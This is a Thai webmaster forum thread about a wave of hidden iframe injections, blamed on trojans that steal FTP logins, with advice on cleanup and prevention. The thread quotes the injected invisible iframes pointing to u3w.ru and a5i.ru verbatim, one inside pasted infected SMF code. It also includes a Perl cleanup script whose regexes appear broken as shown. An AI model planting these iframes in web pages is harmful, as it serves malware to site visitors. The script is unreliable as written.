ต่อไป »

[banban]

2-3 วันนี้ เข้าเวบตัวเองแล้วพบว่า ส่วนบนของบางหน้า บางเวบไซท์ จะมีพื้นที่ว่างๆเกิดขึ้น เมื่อ view sorce ก็พบว่า มี code ดังนี้แทรกอยู่ หลัง tag body

<iframe src="http://u3w.ru:8080/index.php " width=152 height=178 style="visibility: hidden"></iframe>

ผมต้องเอา ไฟล์นั้นๆใน คอมที่บ้าน FTP เข้าไปใหม่ ถึงจะหาย

ไม่รู้มันมาได้ยังไง ใครเป็นบ้าง จะแก้ไขยังไงดีครับ?

[banban]

ลองค้นในเนท พบว่า ....

http://forums.devshed.com/php-...t-5/code-injection-623893.html

[teacup]

cmod 444 ไว้ครับไฟลชื่อ index.php index.htm index.html config.php ทุกไดเรกทอรีที่มี

[dorotee]

ผมก็เคยเจอปัญหานี้เช่นกันครับ

สาเหตุ
(ปัญหานี้ผมเจอกับตัวเลยครับทั้งเว็บส่วนตัวและที่ออฟฟิศ เท่าที่ research และ monitoring ระหว่าง developer & network admin)
พบว่าเกิดจากเจ้าโทรจันที่อยู่ในเครื่องของคุณครับ เจ้าโทรจันตัวนี้ อยู่ในตระกูล trojan.iframe.xxx ซึ่ง xxx นี่
ก็มีอีกหลากหลายตัว หลักการโจมตีคือ เมื่อคุณเปิดเว็บไซต์บางเว็บ อาจจะมีการโหลดสคริปต์บางตัว ซึ่งเป็นการดาวน์โหลด
โทรจันประเภทนี้ เข้ามาเก็บในเครื่องคุณ หลังจากนั้น โทรจันจะเปิดช่องใน สคริปต์หรือไวรัสหรือวอร์ม เข้ามาในเครื่องของคุณ
เจ้าตัวสคริปต์ ตัวนี้แหละที่ทำให้เว็บคุณเจ๊ง โดยตัวมันจะคอยจับข้อมูล FTP หรือโปรแกรมที่ทำงานบนพอร์ต 21
ในเครื่องของคุณ แล้วตัวมันจะทำการส่งคอมมานต์บางอย่าง เพื่อล็อกอินด้วย FTP account ไปยังเว็บโฮสติ้งของคุณ
ถึงตอนนี้เว็บโฮสติ้งของคุณ ก็จะเริ่มโดนลวนลามแล้วคับ ขั้นตอนการทำงานต่อไปของเจ้าสคริปต์ตัวนี้คือ มันจะวิ่ง
ไปยังทุกโฟลเดอร์ภายใต้เว็บโฮสติ้ง เช่นภายใต้ folder public_html ในขณะที่มันลูปทุกโฟลเดอร์อยู่ มันจะรันคอมมานต์
ตัวหนึ่งกับไฟล์ default ของแต่ละโฟลเดอร์เช่น ไฟล์ index.htm, index.html, index.php คอมมานต์ที่มันทำคือ
การ append หรือ replace สคริปต์ ของไฟล์เหล่านี้ด้วย แท็ก iframe ของมัน โดยสคริปต์ทุกสเต็ปที่มันทำมันจะเป็น automation
ทั้งหมด  ครับสิ่งที่มันจะได้คือ backlink จำนวนมหาศาล... โดยสามารถเอาไปทำอย่างอื่นได้เยอะแยะ

วิธีแก้ไข
วิธีแก้ไข ก็ลำบากน่ะ วิธีแก้ไขผมคือ ไล่ลบ iframe สคริปต์ ที่แป้ะบน index ไฟล์ทุกโฟลเดอร์เลย 555 งานนี้ใช้แรงดีกว่าใช้สมอง

วิธีป้องกัน
ตรงนี้น่าสนใจน่ะ เพราะถ้าเราป้องกันไม่ให้เจ้าโทรจันตัวนี้เข้าเครื่องเราได้ ก็จะไปมีปัญหาครับ
1. ผมของแนะนำ antivirus ตัวหนึึ่ง ของเยอรมัน คือเจ้า avira ครับ ตัวนี้สามารถรับมือกับโทรจันนี้ได้
สามารถดาวน์โหลดได้ฟรี ที่ http://www.free-av.de/en/trial..._personal__free_antivirus.html

2. ในส่วนของ FTP client หรือโปรแกรมสำหรับ FTP ตอนที่โดนเล่น ผมใช้ CuteFTP ซึ่งเมื่อเราสร้าง account
มันจะเก็บค่าต่าง ๆ ไว้ในไฟล์ ซึ่งไม่ได้เข้ารหัสครับ ครับตรงนี้คือช่องโหว่ รูเบ้อเร้อเลย ผมเลยหันมาใช้ winscp ครับ ตัวนี้ของเค้าดีครับ
ทั้งลักษณะการเก็บข้อมูลคอนข้างปลอดภัยมาก และยังสามารถทำงานบน portable app ได้ โดยโหลดมาใส่ Thumbdrive แล้วก็สามารถรันได้ทุกที่ทุกเวลาเลยครับ ดาวน์โหลดได้ที่ http://winscp.net/download/winscp422.exe

เท่านี้ทุกอย่างก็โอเคครับ  
  

[Step9]

เดี๋ยวนี้มันแทรกเป็น Track code ด้วย แต่ยังไม่เนียน เพราะทำเว็บเจ๊ง

แล้วก็เวลามันเข้ามาได้ Codeที่ถูกต้องบางตัวจะถูกลบ ถึงจะใช้สคริปกวาดcodeประหลาดออก เว็บก็เจ๊งอยู่ดี


สรุปคือ ถ้าโดนเข้าแล้ว  ต้องเข้าไปตรวจแล้วใช้มือลบ 

[Step9]

cmod 444 ไว้ครับไฟลชื่อ index.php index.htm index.html config.php ทุกไดเรกทอรีที่มี

จะมีผลข้างเคียงกับการทำงานของเว็บยังไงบ้างครับ 

[kazama]

เดี๋ยวนี้มันแทรกเป็น Track code ด้วย แต่ยังไม่เนียน เพราะทำเว็บเจ๊ง

แล้วก็เวลามันเข้ามาได้ Codeที่ถูกต้องบางตัวจะถูกลบ ถึงจะใช้สคริปกวาดcodeประหลาดออก เว็บก็เจ๊งอยู่ดี


สรุปคือ ถ้าโดนเข้าแล้ว  ต้องเข้าไปตรวจแล้วใช้มือลบ 

ของผมเคยเจอ  ลบมือไปสองสามไฟล์ เบื่อ  เลยติดต่อ support ให้ลบให้แทน 

[khonthai]

ผมเจออยู่ครับ ตอนนี้ ไม่รู้จะแก้ยังไง


// Get the function and file to include - if it's not there, do the board index.
   if (!isset($_REQUEST['action']) || !isset($actionArray[$_REQUEST['action']]))
   {
      // Catch the action with the theme?
      if (!empty($settings['catch_action']))
      {
         require_onc
<iframe src="http://a5i.ru:8080/ts/in.cgi?pepsi98 " width=125 height=125 style="visibility: hidden"></iframe>
 

อันนี้เป็น โค้ดของ smf ด้านล่าง ครับ ไม่ทราบว่า ผมจะต้องลบตัวไหน แล้วเพิ่มโค้ดยังไงครับ หน้าถึงจะกลับมาปกติ รบกวนด้วยน่ะครับ :'(

[Reality]

ผมเขียนมาเป็น perl สนใจไหมครับผม

ที่โฮสรัน perl ได้้ไหมครับ


ตอนนี้ไปเปลี่ยนรหัส ftp, cp ก่อนนะครับ

[khonthai]

ตอนนี้เข้าไปเปลี่ยน รหัส แล้วครับ แล้วก็ลองลบ บรรทัดสุดท้ายดูแล้ว แต่ก็ยังไม่ ไม่หาย ไม่รู้ต้องเพิ่มโค้ดไรอีก

[Newbies]

การแก้ไข ขึ้นอยู่กับว่า เว็บที่ใช้ ใช้สคริบหรือ cms ตัวไหนครับ

ถ้าเป็น WordPress ก็ไปหาไฟล์ WordPress เดิมๆ อัพโหลดไปทับเลยจบ

การเช็กย่อย ว่าไฟล์ไหนอีกบ้าง ที่โดน ให้ดูวันที่ last modified ของแต่ละไฟล์ และ folder ครับ โดยสั่งให้โปรแกรม FTP มันเรียงรายการไฟล์ ตามวันเวลา แล้วก็ดูว่าไฟล์ที่โดนไวรัสแทรกนี้ โดน modified วันไหน เวลาไหน
ถ้า folder ย่อยอื่นๆ มี last modified ในเวลาใกล้ๆ กัน ก็เดาได้เลยครับ ว่าไฟล์ใน folder นั้นๆ ก็มีไฟล์โดนด้วย ให้เข้าไปเช็ก และหาไฟล์ต้นฉบับมาใส่ทับลงไปครับ

นอกจากวิธีแก้แบบอัพโหลดทับแล้ว คิดว่าแก้อย่างอื่นไม่ได้ครับ เพราะไฟล์มันเสียไปแล้ว code โดนตัดหายไป ทำให้เว็บเน่า

[Reality]

โค๊ดแก้เป็น perl นะครับ ทำเองใช้เอง

(ไม่อนุญาติให้เอาไปใช้ในเชิงพาณิชย์เน้อครับ)

โค๊ด:

$find = '<iframe src="http://u3w.ru:8080/index.php" width=152 height=178 style="visibility: hidden"></iframe>';
$replace = '';

list($ARGV[0]);

sub list {
	my $path = shift;
	$path .= '/' if($path !~ //$/);
	
	for my $eachFile (glob($path.'*')) {
		if(-d $eachFile) {
			print "[~] Folder: ".$eachFile."/
";
			list($eachFile);
		} else {
			open fp, $eachFile;
			@context = <fp>;
			close fp;
			$r = "@context";
			if($r =~ /u3w.ru:8080/index.php/) { 
				print "[~] Infected: ".$eachFile."
";
				$r =~ s/$find/$replace/g;
				open fp, '>'.$eachFile;
				print fp $r;
				close fp;
			}
		}
	}
}

วิธีใช้ สมมุติ path ในเว็บเราเป็น /xxx/html ให้เราอัพไฟล์ไปตรง /xxx/s.pl (ในที่นี้ใช้ชื่อ s.pl)
แล้ว ssh เข้าไป สั่ง perl s.pl html

หรือใครลองเปลี่ยนเป็น version php ก็แล้วแต่ครับผม

[khonthai]

การแก้ไข ขึ้นอยู่กับว่า เว็บที่ใช้ ใช้สคริบหรือ cms ตัวไหนครับ

ถ้าเป็น WordPress ก็ไปหาไฟล์ WordPress เดิมๆ อัพโหลดไปทับเลยจบ

การเช็กย่อย ว่าไฟล์ไหนอีกบ้าง ที่โดน ให้ดูวันที่ last modified ของแต่ละไฟล์ และ folder ครับ โดยสั่งให้โปรแกรม FTP มันเรียงรายการไฟล์ ตามวันเวลา แล้วก็ดูว่าไฟล์ที่โดนไวรัสแทรกนี้ โดน modified วันไหน เวลาไหน
ถ้า folder ย่อยอื่นๆ มี last modified ในเวลาใกล้ๆ กัน ก็เดาได้เลยครับ ว่าไฟล์ใน folder นั้นๆ ก็มีไฟล์โดนด้วย ให้เข้าไปเช็ก และหาไฟล์ต้นฉบับมาใส่ทับลงไปครับ

นอกจากวิธีแก้แบบอัพโหลดทับแล้ว คิดว่าแก้อย่างอื่นไม่ได้ครับ เพราะไฟล์มันเสียไปแล้ว code โดนตัดหายไป ทำให้เว็บเน่า

ขอบคุณครับ ตอนนี้ผมใช้ smf 1.1.7 ถ้าอัพ เวอร์ชั่นล่าสุด 2.กว่าๆ อัพโหลดไปทับได้เลยใช่ป่าวครับ

[Steve]

เคยโดนครับ แก้แล้ว อีกสองวันก้อเป็นอีก ติดเชื้อไม่จบไม่สิ้น
ปวดตับ ปวดไตมากๆช่วงนั้น ซ้ำร้าย GoogelBot ดันเข้ามาตรวจเวบ
เจอเชื้อโรคนี่อีก แจ้งเตือนใน Search Engine เลย ว่าเวบนี้อันตรายเสี่ยง ...
เล่นอันดับ กับ stat เอารูดมหาราช แถม Adwords ยังแบน account เวบนี้อีก
ขนาดเสียเงินให้ Google นะ มันยังไม่เอาไว้เลย แบนทุกเวบใน บช นี้ชั่วคราว
หาทางแก้เร็วๆนะครับ เรื่องใหญ่นะครับ

เคสตอนผมโดนผมใช้ CuteFTP แบบ donate โหลดฟรีจากเนท
คาดว่าตัวนี้แหละมันดัก password แล้วเข้ามาแก้ไฟล์เอง

ลอง search หาวิธีแก้ในเบนี้แหละครับ ผมก้อ search ทางแก้จากเวบครับ
ขอให้โชคดีครับ

[nongkop]

เวปผมก็โดน 

ขอบคุณนะครับ สำหรับคำแนะนำ   

[Newbies]

การแก้ไข ขึ้นอยู่กับว่า เว็บที่ใช้ ใช้สคริบหรือ cms ตัวไหนครับ

ถ้าเป็น WordPress ก็ไปหาไฟล์ WordPress เดิมๆ อัพโหลดไปทับเลยจบ

การเช็กย่อย ว่าไฟล์ไหนอีกบ้าง ที่โดน ให้ดูวันที่ last modified ของแต่ละไฟล์ และ folder ครับ โดยสั่งให้โปรแกรม FTP มันเรียงรายการไฟล์ ตามวันเวลา แล้วก็ดูว่าไฟล์ที่โดนไวรัสแทรกนี้ โดน modified วันไหน เวลาไหน
ถ้า folder ย่อยอื่นๆ มี last modified ในเวลาใกล้ๆ กัน ก็เดาได้เลยครับ ว่าไฟล์ใน folder นั้นๆ ก็มีไฟล์โดนด้วย ให้เข้าไปเช็ก และหาไฟล์ต้นฉบับมาใส่ทับลงไปครับ

นอกจากวิธีแก้แบบอัพโหลดทับแล้ว คิดว่าแก้อย่างอื่นไม่ได้ครับ เพราะไฟล์มันเสียไปแล้ว code โดนตัดหายไป ทำให้เว็บเน่า

ขอบคุณครับ ตอนนี้ผมใช้ smf 1.1.7 ถ้าอัพ เวอร์ชั่นล่าสุด 2.กว่าๆ อัพโหลดไปทับได้เลยใช่ป่าวครับ

จะให้ดี ควรเป็น version เดียวกันดีกว่าครับ

หรือหาไม่ได้จริงๆ ก็ค่อย assume เอาว่าใช้ได้ละกันครับ เพราะไฟล์ index.php ส่วนมากจะไม่ค่อยมีเนื้อหาอะไร มันไม่ใช่ core ของสคริบ

[khonthai]

เว็บผมกลับมาแล้ววววววววววววครับบบบบบบบบบบบ ดีใจมากมาย เนื่องจาก ท่าน Newbies

การเช็กย่อย ว่าไฟล์ไหนอีกบ้าง ที่โดน ให้ดูวันที่ last modified ของแต่ละไฟล์ และ folder ครับ โดยสั่งให้โปรแกรม FTP มันเรียงรายการไฟล์ ตามวันเวลา แล้วก็ดูว่าไฟล์ที่โดนไวรัสแทรกนี้ โดน modified วันไหน เวลาไหน
ถ้า folder ย่อยอื่นๆ มี last modified ในเวลาใกล้ๆ กัน ก็เดาได้เลยครับ ว่าไฟล์ใน folder นั้นๆ ก็มีไฟล์โดนด้วย

อ่านแล้ว ปิ๊งทันทีทันใด ผมเข้าไปดูที่ file manager ในเว็บ โฮส แล้วไปดูวันที่ ที่มันเปลียน แล้วเจอเพียบเลย ผมเลย เข้าไปที่ history แล้ว restore มันกลับคืน แล้วเว็บก็กลับมา

 จากนี้ผมคงจะจัดการ กับ ตัวที่มันอยู่ที่ คอมพิวเตอร์ ผม ว่าแต่ http://www.free-av.de/en/trial..._personal__free_antivirus.html  โหลดไม่ได้เลยครับ โหลดๆไป มันก็บอกว่าโหลดต่อไม่ได้
 แล้วก็คงจะเปลี่ยน ftp เพราะเปลี่ยน password ล่ะ

ขอบคุณทุกท่านมากๆครับ

[dorotee]

แก้ไขลิ้งก์สำหรับโหลด avira free antivirus เป็น http://www.free-av.de/en/download/index.html